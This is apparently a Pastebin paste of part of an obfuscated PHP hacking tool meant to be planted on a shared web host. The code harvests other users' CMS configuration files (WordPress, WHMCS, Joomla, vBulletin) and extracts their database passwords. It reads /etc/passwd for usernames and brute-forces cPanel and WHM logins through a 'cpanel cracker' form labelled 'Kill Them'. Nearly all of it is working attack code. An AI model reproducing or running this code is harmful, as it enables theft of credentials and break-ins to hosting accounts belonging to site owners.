  1273. $ghknfyflg="uurl";
  1274. $ {
  1275. "GLOBALS"
  1276. }
  1277. ["vxtiswnt"]="uel";
  1278. $fmcdexbf="ch";
  1279. $oebhbtqi="uxl";
  1280. $nkpoepwpdqd="result";
  1281. $mbpipeu="uxl";
  1282. $ {
  1283. $ghknfyflg
  1284. }
  1285. =$ {
  1286. $pohpfdtmti
  1287. }
  1288. .$ {
  1289. $ {
  1290. "GLOBALS"
  1291. }
  1292. ["tfufwtkggg"]
  1293. }
  1294. .$ {
  1295. $nmkswatkkt
  1296. }
  1297. ;
  1298. $anhgzfy="ch";
  1299. $ {
  1300. $ {
  1301. "GLOBALS"
  1302. }
  1303. ["vxtiswnt"]
  1304. }
  1305. =$ {
  1306. $ {
  1307. "GLOBALS"
  1308. }
  1309. ["pemxmrsh"]
  1310. }
  1311. ;
  1312. $ {
  1313. $ {
  1314. "GLOBALS"
  1315. }
  1316. ["clcexgoc"]
  1317. }
  1318. =curl_init();
  1319. $ {
  1320. "GLOBALS"
  1321. }
  1322. ["wppiyrcdbbn"]="ch";
  1323. $kgbbmpotw="uxl";
  1324. curl_setopt($ {
  1325. $ {
  1326. "GLOBALS"
  1327. }
  1328. ["clcexgoc"]
  1329. }
  1330. ,CURLOPT_URL,$ {
  1331. $wzhjhoquw
  1332. }
  1333. );
  1334. curl_setopt($ {
  1335. $ {
  1336. "GLOBALS"
  1337. }
  1338. ["nchjukvvqit"]
  1339. }
  1340. ,CURLOPT_HEADER,1);
  1341. curl_setopt($ {
  1342. $anhgzfy
  1343. }
  1344. ,CURLOPT_RETURNTRANSFER,1);
  1345. $gqfsexakg="ch";
  1346. curl_setopt($ {
  1347. $gqfsexakg
  1348. }
  1349. ,CURLOPT_CONNECTTIMEOUT,5);
  1350. $wgmhnq="uxl";
  1351. $ {
  1352. "GLOBALS"
  1353. }
  1354. ["jpvfshlwt"]="uxl";
  1355. $cpyvvnpbpbc="uxl";
  1356. curl_setopt($ {
  1357. $ {
  1358. "GLOBALS"
  1359. }
  1360. ["wppiyrcdbbn"]
  1361. }
  1362. ,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8");
  1363. $ {
  1364. $ {
  1365. "GLOBALS"
  1366. }
  1367. ["ytygxi"]
  1368. }
  1369. ["EXE"]=curl_exec($ {
  1370. $fmcdexbf
  1371. }
  1372. );
  1373. curl_close($ {
  1374. $lqovtogmdro
  1375. }
  1376. );
  1377. $ {
  1378. $ {
  1379. "GLOBALS"
  1380. }
  1381. ["smposrbewu"]
  1382. }
  1383. =$ {
  1384. $nkpoepwpdqd
  1385. }
  1386. ["EXE"];
  1387. $dsojfl="uxl";
  1388. $ {
  1389. "GLOBALS"
  1390. }
  1391. ["glpswt"]="uxl";
  1392. if($ {
  1393. $kgbbmpotw
  1394. }
  1395. &&preg_match("/table_prefix/i",$ {
  1396. $ptrckqlsicw
  1397. }
  1398. )) {
  1399. $xoynetliybs="ffile";
  1400. $ {
  1401. "GLOBALS"
  1402. }
  1403. ["mbbohos"]="pass";
  1404. $ {
  1405. "GLOBALS"
  1406. }
  1407. ["jkoqdoylpm"]="dbp";
  1408. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
  1409. echo$ {
  1410. $ {
  1411. "GLOBALS"
  1412. }
  1413. ["dseeueq"]
  1414. }
  1415. =entre2v2($ {
  1416. $ {
  1417. "GLOBALS"
  1418. }
  1419. ["smposrbewu"]
  1420. }
  1421. ,"DB_PASSWORD', '","');");
  1422. if(!empty($ {
  1423. $ {
  1424. "GLOBALS"
  1425. }
  1426. ["dseeueq"]
  1427. }
  1428. ))$ {
  1429. $ {
  1430. "GLOBALS"
  1431. }
  1432. ["mbbohos"]
  1433. }
  1434. =$ {
  1435. $ {
  1436. "GLOBALS"
  1437. }
  1438. ["jkoqdoylpm"]
  1439. }
  1440. ."
  1441. ";
  1442. fwrite($ {
  1443. $xoynetliybs
  1444. }
  1445. ,$ {
  1446. $ {
  1447. "GLOBALS"
  1448. }
  1449. ["jqbdqptiz"]
  1450. }
  1451. );
  1452. } elseif($ {
  1453. $ {
  1454. "GLOBALS"
  1455. }
  1456. ["smposrbewu"]
  1457. }
  1458. &&preg_match("/cc_encryption_hash/i",$ {
  1459. $ {
  1460. "GLOBALS"
  1461. }
  1462. ["smposrbewu"]
  1463. }
  1464. )) {
  1465. $ {
  1466. "GLOBALS"
  1467. }
  1468. ["kmisenk"]="ffile";
  1469. $ {
  1470. "GLOBALS"
  1471. }
  1472. ["vjmxfhywxr"]="uxl";
  1473. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
  1474. $ {
  1475. "GLOBALS"
  1476. }
  1477. ["weynhgik"]="pass";
  1478. $ukdseoc="pass";
  1479. $ {
  1480. "GLOBALS"
  1481. }
  1482. ["htwkxy"]="dbp";
  1483. echo$ {
  1484. $ {
  1485. "GLOBALS"
  1486. }
  1487. ["dseeueq"]
  1488. }
  1489. =entre2v2($ {
  1490. $ {
  1491. "GLOBALS"
  1492. }
  1493. ["vjmxfhywxr"]
  1494. }
  1495. ,"db_password = '","';");
  1496. if(!empty($ {
  1497. $ {
  1498. "GLOBALS"
  1499. }
  1500. ["htwkxy"]
  1501. }
  1502. ))$ {
  1503. $ukdseoc
  1504. }
  1505. =$ {
  1506. $ {
  1507. "GLOBALS"
  1508. }
  1509. ["dseeueq"]
  1510. }
  1511. ."
  1512. ";
  1513. fwrite($ {
  1514. $ {
  1515. "GLOBALS"
  1516. }
  1517. ["kmisenk"]
  1518. }
  1519. ,$ {
  1520. $ {
  1521. "GLOBALS"
  1522. }
  1523. ["weynhgik"]
  1524. }
  1525. );
  1526. } elseif($ {
  1527. $ {
  1528. "GLOBALS"
  1529. }
  1530. ["smposrbewu"]
  1531. }
  1532. &&preg_match("/dbprefix/i",$ {
  1533. $dsojfl
  1534. }
  1535. )) {
  1536. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
  1537. echo$ {
  1538. $ {
  1539. "GLOBALS"
  1540. }
  1541. ["nheadbdqjtu"]
  1542. }
  1543. =entre2v2($ {
  1544. $ {
  1545. "GLOBALS"
  1546. }
  1547. ["smposrbewu"]
  1548. }
  1549. ,"password = '","';");
  1550. if(!empty($ {
  1551. $ {
  1552. "GLOBALS"
  1553. }
  1554. ["nheadbdqjtu"]
  1555. }
  1556. ))$ {
  1557. $ {
  1558. "GLOBALS"
  1559. }
  1560. ["jqbdqptiz"]
  1561. }
  1562. =$ {
  1563. $ {
  1564. "GLOBALS"
  1565. }
  1566. ["nheadbdqjtu"]
  1567. }
  1568. ."
  1569. ";
  1570. fwrite($ {
  1571. $ {
  1572. "GLOBALS"
  1573. }
  1574. ["xqjsjx"]
  1575. }
  1576. ,$ {
  1577. $ {
  1578. "GLOBALS"
  1579. }
  1580. ["jqbdqptiz"]
  1581. }
  1582. );
  1583. } elseif($ {
  1584. $hehrkezdpk
  1585. }
  1586. &&preg_match("/admincpdir/i",$ {
  1587. $ {
  1588. "GLOBALS"
  1589. }
  1590. ["glpswt"]
  1591. }
  1592. )) {
  1593. $ {
  1594. "GLOBALS"
  1595. }
  1596. ["htwdbdmj"]="ffile";
  1597. $gjyjauxxdfpq="db";
  1598. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
  1599. $ {
  1600. "GLOBALS"
  1601. }
  1602. ["wripkprnh"]="uxl";
  1603. echo$ {
  1604. $gjyjauxxdfpq
  1605. }
  1606. =entre2v2($ {
  1607. $ {
  1608. "GLOBALS"
  1609. }
  1610. ["wripkprnh"]
  1611. }
  1612. ,"password'] = '","';");
  1613. if(!empty($ {
  1614. $ {
  1615. "GLOBALS"
  1616. }
  1617. ["nheadbdqjtu"]
  1618. }
  1619. ))$ {
  1620. $ {
  1621. "GLOBALS"
  1622. }
  1623. ["jqbdqptiz"]
  1624. }
  1625. =$ {
  1626. $ {
  1627. "GLOBALS"
  1628. }
  1629. ["nheadbdqjtu"]
  1630. }
  1631. ."
  1632. ";
  1633. fwrite($ {
  1634. $ {
  1635. "GLOBALS"
  1636. }
  1637. ["htwdbdmj"]
  1638. }
  1639. ,$ {
  1640. $ {
  1641. "GLOBALS"
  1642. }
  1643. ["jqbdqptiz"]
  1644. }
  1645. );
  1646. } elseif($ {
  1647. $oebhbtqi
  1648. }
  1649. &&preg_match("/DB_DATABASE/i",$ {
  1650. $ {
  1651. "GLOBALS"
  1652. }
  1653. ["smposrbewu"]
  1654. }
  1655. )) {
  1656. $hlhjxgxol="db";
  1657. $ {
  1658. "GLOBALS"
  1659. }
  1660. ["osbyycmsfkxm"]="db";
  1661. $ {
  1662. "GLOBALS"
  1663. }
  1664. ["rdvmodv"]="pass";
  1665. $ {
  1666. "GLOBALS"
  1667. }
  1668. ["ssvsiovd"]="db";
  1669. $quoeboygi="pass";
  1670. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
  1671. echo$ {
  1672. $ {
  1673. "GLOBALS"
  1674. }
  1675. ["ssvsiovd"]
  1676. }
  1677. =entre2v2($ {
  1678. $ {
  1679. "GLOBALS"
  1680. }
  1681. ["smposrbewu"]
  1682. }
  1683. ,"DB_PASSWORD', '","');");
  1684. if(!empty($ {
  1685. $hlhjxgxol
  1686. }
  1687. ))$ {
  1688. $quoeboygi
  1689. }
  1690. =$ {
  1691. $ {
  1692. "GLOBALS"
  1693. }
  1694. ["osbyycmsfkxm"]
  1695. }
  1696. ."
  1697. ";
  1698. fwrite($ {
  1699. $ {
  1700. "GLOBALS"
  1701. }
  1702. ["xqjsjx"]
  1703. }
  1704. ,$ {
  1705. $ {
  1706. "GLOBALS"
  1707. }
  1708. ["rdvmodv"]
  1709. }
  1710. );
  1711. } elseif($ {
  1712. $wgmhnq
  1713. }
  1714. &&preg_match("/dbpass/i",$ {
  1715. $ {
  1716. "GLOBALS"
  1717. }
  1718. ["jpvfshlwt"]
  1719. }
  1720. )) {
  1721. $gbelrygh="pass";
  1722. $ {
  1723. "GLOBALS"
  1724. }
  1725. ["krskycqvw"]="db";
  1726. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1727. $dnoptjeza="db";
  1728. echo$ {
  1729. $ {
  1730. "GLOBALS"
  1731. }
  1732. ["krskycqvw"]
  1733. }
  1734. =entre2v2($ {
  1735. $ {
  1736. "GLOBALS"
  1737. }
  1738. ["smposrbewu"]
  1739. }
  1740. ,"dbpass = '","';");
  1741. if(!empty($ {
  1742. $ {
  1743. "GLOBALS"
  1744. }
  1745. ["nheadbdqjtu"]
  1746. }
  1747. ))$ {
  1748. $gbelrygh
  1749. }
  1750. =$ {
  1751. $dnoptjeza
  1752. }
  1753. ."
  1754. ";
  1755. fwrite($ {
  1756. $ {
  1757. "GLOBALS"
  1758. }
  1759. ["xqjsjx"]
  1760. }
  1761. ,$ {
  1762. $ {
  1763. "GLOBALS"
  1764. }
  1765. ["jqbdqptiz"]
  1766. }
  1767. );
  1768. } elseif($ {
  1769. $ {
  1770. "GLOBALS"
  1771. }
  1772. ["smposrbewu"]
  1773. }
  1774. &&preg_match("/dbpass/i",$ {
  1775. $ {
  1776. "GLOBALS"
  1777. }
  1778. ["smposrbewu"]
  1779. }
  1780. )) {
  1781. $ {
  1782. "GLOBALS"
  1783. }
  1784. ["tsvcdhbxjjcy"]="db";
  1785. $uamjgbemxfm="pass";
  1786. $vhwdotel="uxl";
  1787. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
  1788. echo$ {
  1789. $ {
  1790. "GLOBALS"
  1791. }
  1792. ["tsvcdhbxjjcy"]
  1793. }
  1794. =entre2v2($ {
  1795. $vhwdotel
  1796. }
  1797. ,"dbpass = '","';");
  1798. $ {
  1799. "GLOBALS"
  1800. }
  1801. ["jzcldxweqx"]="db";
  1802. if(!empty($ {
  1803. $ {
  1804. "GLOBALS"
  1805. }
  1806. ["jzcldxweqx"]
  1807. }
  1808. ))$ {
  1809. $uamjgbemxfm
  1810. }
  1811. =$ {
  1812. $ {
  1813. "GLOBALS"
  1814. }
  1815. ["nheadbdqjtu"]
  1816. }
  1817. ."
  1818. ";
  1819. fwrite($ {
  1820. $ {
  1821. "GLOBALS"
  1822. }
  1823. ["xqjsjx"]
  1824. }
  1825. ,$ {
  1826. $ {
  1827. "GLOBALS"
  1828. }
  1829. ["jqbdqptiz"]
  1830. }
  1831. );
  1832. } elseif($ {
  1833. $cpyvvnpbpbc
  1834. }
  1835. &&preg_match("/dbpass/i",$ {
  1836. $mbpipeu
  1837. }
  1838. )) {
  1839. $ynqhaxyy="uxl";
  1840. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1841. $hjtezrws="db";
  1842. echo$ {
  1843. $ {
  1844. "GLOBALS"
  1845. }
  1846. ["nheadbdqjtu"]
  1847. }
  1848. =entre2v2($ {
  1849. $ynqhaxyy
  1850. }
  1851. ,"dbpass = \"","\";");
  1852. if(!empty($ {
  1853. $ {
  1854. "GLOBALS"
  1855. }
  1856. ["nheadbdqjtu"]
  1857. }
  1858. ))$ {
  1859. $ {
  1860. "GLOBALS"
  1861. }
  1862. ["jqbdqptiz"]
  1863. }
  1864. =$ {
  1865. $hjtezrws
  1866. }
  1867. ."
  1868. ";
  1869. fwrite($ {
  1870. $ {
  1871. "GLOBALS"
  1872. }
  1873. ["xqjsjx"]
  1874. }
  1875. ,$ {
  1876. $ {
  1877. "GLOBALS"
  1878. }
  1879. ["jqbdqptiz"]
  1880. }
  1881. );
  1882. }
  1883. }
  1884. }
  1885. }
  1886. echo "
  1887. <form method=post>
  1888. <input type=submit name=cpanel value=\"Auto username/password loading cpanel cracker\"><p>
  1889. ";
  1890. if(isset($_POST["cpanel"])) {
  1891. echo "<form method=post><div align=center><table>
  1892. want to brute=><select name=\"op\"> <option name=\"op\" value=\"cp\">CPanel</option>
  1893. <option name=\"op\" value=\"whm\">WHMPanel</option></table><p>
  1894. <textarea style=\"background:black;color:white\" rows=20 cols=25 name=usernames >";
  1895. $porqnvoe="d";
  1896. $ {
  1897. $ {
  1898. "GLOBALS"
  1899. }
  1900. ["oqvsusmuih"]
  1901. }
  1902. =file("/etc/passwd");
  1903. foreach($ {
  1904. $ {
  1905. "GLOBALS"
  1906. }
  1907. ["oqvsusmuih"]
  1908. }
  1909. as$ {
  1910. $ {
  1911. "GLOBALS"
  1912. }
  1913. ["mppsifb"]
  1914. }
  1915. ) {
  1916. $lpbvwsc="str";
  1917. $ {
  1918. $lpbvwsc
  1919. }
  1920. =explode(":",$ {
  1921. $ {
  1922. "GLOBALS"
  1923. }
  1924. ["mppsifb"]
  1925. }
  1926. );
  1927. echo$ {
  1928. $ {
  1929. "GLOBALS"
  1930. }
  1931. ["tnsglnuwozs"]
  1932. }
  1933. [0]."
  1934. ";
  1935. }
  1936. echo "</textarea><textarea style=\"background:black;color:white\" rows=20 cols=25 name=passwords >
  1937. ";
  1938. $ {
  1939. "GLOBALS"
  1940. }
  1941. ["hifnaqbo"]="rt";
  1942. $ {
  1943. $ {
  1944. "GLOBALS"
  1945. }
  1946. ["frnguil"]
  1947. }
  1948. =getcwd()."/r.txt";
  1949. $ {
  1950. $ {
  1951. "GLOBALS"
  1952. }
  1953. ["mpzmgvjrk"]
  1954. }
  1955. =file($ {
  1956. $porqnvoe
  1957. }
  1958. );
  1959. foreach($ {
  1960. $ {
  1961. "GLOBALS"
  1962. }
  1963. ["mpzmgvjrk"]
  1964. }
  1965. as$ {
  1966. $ {
  1967. "GLOBALS"
  1968. }
  1969. ["hifnaqbo"]
  1970. }
  1971. ) {
  1972. $ {
  1973. "GLOBALS"
  1974. }
  1975. ["rxcdwquaxrv"]="str";
  1976. $ {
  1977. $ {
  1978. "GLOBALS"
  1979. }
  1980. ["rxcdwquaxrv"]
  1981. }
  1982. =explode("\\n",$ {
  1983. $ {
  1984. "GLOBALS"
  1985. }
  1986. ["pkxusn"]
  1987. }
  1988. );
  1989. echo trim($ {
  1990. $ {
  1991. "GLOBALS"
  1992. }
  1993. ["tnsglnuwozs"]
  1994. }
  1995. [0])."
  1996. ";
  1997. }
  1998. echo "</textarea><p>
  1999. <input type=submit name=cpanelcracking value=\"Kill Them\"></form>
  2000. ";
  2001. }
  2002. $jgbrxerezme="connect_timeout";
  2003. echo "
  2004. ";
  2005. error_reporting(0);
  2006. $ {
  2007. $jgbrxerezme
  2008. }
  2009. =5;
  2010. set_time_limit(0);
  2011. $ {
  2012. $ {
  2013. "GLOBALS"
  2014. }
  2015. ["fhuebeob"]
  2016. }
  2017. =$_POST["usernames"];
  2018. $ {
  2019. $ {
  2020. "GLOBALS"
  2021. }
  2022. ["avvdiennau"]
  2023. }
  2024. =$_POST["passwords"];
  2025. $ {
  2026. $ {
  2027. "GLOBALS"
  2028. }
  2029. ["jtxbycj"]
  2030. }
  2031. =$_POST["op"];
  2032. $ {
  2033. $ {
  2034. "GLOBALS"
  2035. }
  2036. ["ytidfmauvywq"]
  2037. }
  2038. ="localhost";
  2039. if(isset($_POST["cpanelcracking"])) {
  2040. $ {
  2041. "GLOBALS"
  2042. }
  2043. ["ryljoecvcpn"]="passl";
  2044. $qggkxhpojj="userl";
  2045. if($ {
  2046. $qggkxhpojj
  2047. }
  2048. !==""&&$ {
  2049. $ {
  2050. "GLOBALS"
  2051. }
  2052. ["ryljoecvcpn"]
  2053. }
  2054. !=="") {
  2055. $ {
  2056. "GLOBALS"
  2057. }
  2058. ["tjgmxqwijql"]="userl";
  2059. if($_POST["op"]=="cp") {
  2060. $eftvchhiwf="cracked";
  2061. $ {
  2062. $ {
  2063. "GLOBALS"
  2064. }
  2065. ["cmlkxbh"]
  2066. }
  2067. =$_POST["crack"];
  2068. @fopen($ {
  2069. $eftvchhiwf
  2070. }
  2071. ,"a");
  2072. echo"now we are attacking cpanels....please wait till the end of process
  2073. ";
  2074. } elseif($_POST["op"]=="whm") {
  2075. @fopen($ {
  2076. $ {
  2077. "GLOBALS"
  2078. }
  2079. ["cmlkxbh"]
  2080. }
  2081. ,"a");
  2082. echo"now we are attacking WHM panel....please wait till the end of process";
  2083. }
  2084. function cpanel($host,$user,$pass,$timeout) {
  2085. $ {
  2086. "GLOBALS"
  2087. }
  2088. ["ltiohgnp"]="ch";
  2089. $ {
  2090. "GLOBALS"
  2091. }
  2092. ["ymjcnlxywym"]="data";
  2093. $ {
  2094. $ {
  2095. "GLOBALS"
  2096. }
  2097. ["clcexgoc"]
  2098. }
  2099. =curl_init();
  2100. curl_setopt($ {
  2101. $ {
  2102. "GLOBALS"
  2103. }
  2104. ["clcexgoc"]
  2105. }
  2106. ,CURLOPT_URL,"http://$host:2082");
  2107. $ {
  2108. "GLOBALS"
  2109. }
  2110. ["rvlqflyggs"]="ch";
  2111. $yoqgvcb="ch";
  2112. curl_setopt($ {
  2113. $ {
  2114. "GLOBALS"
  2115. }
  2116. ["rvlqflyggs"]
  2117. }
  2118. ,CURLOPT_RETURNTRANSFER,1);
  2119. curl_setopt($ {
  2120. $ {
  2121. "GLOBALS"
  2122. }
  2123. ["ltiohgnp"]
  2124. }
  2125. ,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  2126. curl_setopt($ {
  2127. $ {
  2128. "GLOBALS"
  2129. }
  2130. ["clcexgoc"]
  2131. }
  2132. ,CURLOPT_USERPWD,"$user:$pass");
  2133. curl_setopt($ {
  2134. $ {
  2135. "GLOBALS"
  2136. }
  2137. ["clcexgoc"]
  2138. }
  2139. ,CURLOPT_CONNECTTIMEOUT,$ {
  2140. $ {
  2141. "GLOBALS"
  2142. }
  2143. ["ainkhzdg"]
  2144. }
  2145. );
  2146. $rcmngcbqlp="ch";
  2147. curl_setopt($ {
  2148. $ {
  2149. "GLOBALS"
  2150. }
  2151. ["clcexgoc"]
  2152. }
  2153. ,CURLOPT_FAILONERROR,1);
  2154. $ {
  2155. $ {
  2156. "GLOBALS"
  2157. }
  2158. ["ymjcnlxywym"]
  2159. }
  2160. =curl_exec($ {
  2161. $rcmngcbqlp
  2162. }
  2163. );
  2164. if(curl_errno($ {
  2165. $yoqgvcb
  2166. }
  2167. )==0) {
  2168. echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  2169. }
  2170. curl_close($ {
  2171. $ {
  2172. "GLOBALS"
  2173. }
  2174. ["clcexgoc"]
  2175. }
  2176. );
  2177. }
  2178. $ {
  2179. $ {
  2180. "GLOBALS"
  2181. }
  2182. ["cywofo"]
  2183. }
  2184. =explode("
  2185. ",$ {
  2186. $ {
  2187. "GLOBALS"
  2188. }
  2189. ["afrrfxkgbv"]
  2190. }
  2191. );
  2192. $ {
  2193. $ {
  2194. "GLOBALS"
  2195. }
  2196. ["iasgvgve"]
  2197. }
  2198. =explode("
  2199. ",$ {
  2200. $ {
  2201. "GLOBALS"
  2202. }
  2203. ["avvdiennau"]
  2204. }
  2205. );
  2206. if($ {
  2207. $ {
  2208. "GLOBALS"
  2209. }
  2210. ["jtxbycj"]
  2211. }
  2212. =="cp") {
  2213. $rqqyjvw="userlist";
  2214. foreach($ {
  2215. $rqqyjvw
  2216. }
  2217. as$ {
  2218. $ {
  2219. "GLOBALS"
  2220. }
  2221. ["mppsifb"]
  2222. }
  2223. ) {
  2224. $ {
  2225. "GLOBALS"
  2226. }
  2227. ["jkbgmwekkxo"]="user";
  2228. $ {
  2229. "GLOBALS"
  2230. }
  2231. ["nfrmapgqp"]="password";
  2232. echo"<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  2233. $ {
  2234. $ {
  2235. "GLOBALS"
  2236. }
  2237. ["wqykbxlcrzw"]
  2238. }
  2239. =trim($ {
  2240. $ {
  2241. "GLOBALS"
  2242. }
  2243. ["jkbgmwekkxo"]
  2244. }
  2245. );
  2246. foreach($ {
  2247. $ {
  2248. "GLOBALS"
  2249. }
  2250. ["iasgvgve"]
  2251. }
  2252. as$ {
  2253. $ {
  2254. "GLOBALS"
  2255. }
  2256. ["nfrmapgqp"]
  2257. }
  2258. ) {
  2259. $ {
  2260. "GLOBALS"
  2261. }
  2262. ["vfloulq"]="finaluser";
  2263. $ {
  2264. "GLOBALS"
  2265. }
  2266. ["gugnulvu"]="password";
  2267. $ {
  2268. "GLOBALS"
  2269. }
  2270. ["zthmsnxjxpd"]="finalpass";
  2271. $ {
  2272. $ {
  2273. "GLOBALS"
  2274. }
  2275. ["zthmsnxjxpd"]
  2276. }
  2277. =trim($ {
  2278. $ {
  2279. "GLOBALS"
  2280. }
  2281. ["gugnulvu"]
  2282. }
  2283. );
  2284. cpanel($ {
  2285. $ {
  2286. "GLOBALS"
  2287. }
  2288. ["qkfpdhf"]
  2289. }
  2290. ,$ {
  2291. $ {
  2292. "GLOBALS"
  2293. }
  2294. ["vfloulq"]
  2295. }
  2296. ,$ {
  2297. $ {
  2298. "GLOBALS"
  2299. }
  2300. ["onsdfdthx"]
  2301. }
  2302. ,$ {
  2303. $ {
  2304. "GLOBALS"
  2305. }
  2306. ["trhahkqrevw"]
  2307. }
  2308. );
  2309. }
  2310. }
  2311. }
  2312. $vlxjwdbxb="attack";
  2313. function whm($host,$user,$pass,$timeout) {
  2314. $dxtkzggvz="ch";
  2315. $ {
  2316. $ {
  2317. "GLOBALS"
  2318. }
  2319. ["clcexgoc"]
  2320. }
  2321. =curl_init();
  2322. curl_setopt($ {
  2323. $ {
  2324. "GLOBALS"
  2325. }
  2326. ["clcexgoc"]
  2327. }
  2328. ,CURLOPT_URL,"http://$host:2086");
  2329. $ {
  2330. "GLOBALS"
  2331. }
  2332. ["punmlep"]="ch";
  2333. curl_setopt($ {
  2334. $ {
  2335. "GLOBALS"
  2336. }
  2337. ["clcexgoc"]
  2338. }
  2339. ,CURLOPT_RETURNTRANSFER,1);
  2340. $brltfbtspgf="ch";
  2341. $ {
  2342. "GLOBALS"
  2343. }
  2344. ["rbyfstgofou"]="ch";
  2345. curl_setopt($ {
  2346. $dxtkzggvz
  2347. }
  2348. ,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  2349. curl_setopt($ {
  2350. $ {
  2351. "GLOBALS"
  2352. }
  2353. ["clcexgoc"]
  2354. }
  2355. ,CURLOPT_USERPWD,"$user:$pass");
  2356. curl_setopt($ {
  2357. $ {
  2358. "GLOBALS"
  2359. }
  2360. ["clcexgoc"]
  2361. }
  2362. ,CURLOPT_CONNECTTIMEOUT,$ {
  2363. $ {
  2364. "GLOBALS"
  2365. }
  2366. ["ainkhzdg"]
  2367. }
  2368. );
  2369. curl_setopt($ {
  2370. $ {
  2371. "GLOBALS"
  2372. }
  2373. ["clcexgoc"]
  2374. }
  2375. ,CURLOPT_FAILONERROR,1);
  2376. $ {
  2377. $ {
  2378. "GLOBALS"
  2379. }
  2380. ["tmwmkkbdjy"]
  2381. }
  2382. =curl_exec($ {
  2383. $ {
  2384. "GLOBALS"
  2385. }
  2386. ["punmlep"]
  2387. }
  2388. );
  2389. if(curl_errno($ {
  2390. $brltfbtspgf
  2391. }
  2392. )==0) {
  2393. echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  2394. }
  2395. curl_close($ {
  2396. $ {
  2397. "GLOBALS"
  2398. }
  2399. ["rbyfstgofou"]
  2400. }
  2401. );
  2402. }
  2403. $pjjgkbchjh="userlist";
  2404. $ {
  2405. "GLOBALS"
  2406. }
  2407. ["iuvrfxys"]="passl";
  2408. $ {
  2409. $pjjgkbchjh
  2410. }
  2411. =explode("
  2412. ",$ {
  2413. $ {
  2414. "GLOBALS"
  2415. }
  2416. ["tjgmxqwijql"]
  2417. }
  2418. );
  2419. $ {
  2420. $ {
  2421. "GLOBALS"
  2422. }
  2423. ["iasgvgve"]
  2424. }
  2425. =explode("
  2426. ",$ {
  2427. $ {
  2428. "GLOBALS"
  2429. }
  2430. ["iuvrfxys"]
  2431. }
  2432. );
  2433. if($ {
  2434. $vlxjwdbxb
  2435. }
  2436. =="whm") {
  2437. $vilwukxpjzn="userlist";
  2438. foreach($ {
  2439. $vilwukxpjzn
  2440. }
  2441. as$ {
  2442. $ {
  2443. "GLOBALS"
  2444. }
  2445. ["mppsifb"]
  2446. }
  2447. ) {
  2448. echo"<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  2449. $ {
  2450. "GLOBALS"
  2451. }
  2452. ["uxvypjylg"]="password";
  2453. $ {
  2454. $ {
  2455. "GLOBALS"
  2456. }
  2457. ["wqykbxlcrzw"]
  2458. }
  2459. =trim($ {
  2460. $ {
  2461. "GLOBALS"
  2462. }
  2463. ["mppsifb"]
  2464. }
  2465. );
  2466. foreach($ {
  2467. $ {
  2468. "GLOBALS"
  2469. }
  2470. ["iasgvgve"]
  2471. }
  2472. as$ {
  2473. $ {
  2474. "GLOBALS"
  2475. }
  2476. ["uxvypjylg"]
  2477. }
  2478. ) {
  2479. $ {
  2480. "GLOBALS"
  2481. }
  2482. ["pdqibcl"]="finalpass";
  2483. $iorfkywtph="finalpass";
  2484. $ {
  2485. $ {
  2486. "GLOBALS"
  2487. }
  2488. ["pdqibcl"]
  2489. }
  2490. =trim($ {
  2491. $ {
  2492. "GLOBALS"
  2493. }
  2494. ["urgtxxu"]
  2495. }
  2496. );
  2497. whm($ {
  2498. $ {
  2499. "GLOBALS"
  2500. }
  2501. ["qkfpdhf"]
  2502. }
  2503. ,$ {
  2504. $ {
  2505. "GLOBALS"
  2506. }
  2507. ["wqykbxlcrzw"]
  2508. }
  2509. ,$ {
  2510. $iorfkywtph
  2511. }
  2512. ,$ {
  2513. $ {
  2514. "GLOBALS"
  2515. }
  2516. ["trhahkqrevw"]
  2517. }
  2518. );
  2519. }
  2520. }
  2521. }
  2522. } elseif($ {
  2523. $ {
  2524. "GLOBALS"
  2525. }
  2526. ["afrrfxkgbv"]
  2527. }
  2528. =="") {
  2529. echo"what are you doing :( , you have left userlist field empty";
  2530. } elseif($ {
  2531. $ {
  2532. "GLOBALS"
  2533. }
  2534. ["avvdiennau"]
  2535. }
  2536. =="") {
  2537. echo"please put passwords in paasword list field";
  2538. }
  2539. }
  2540. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!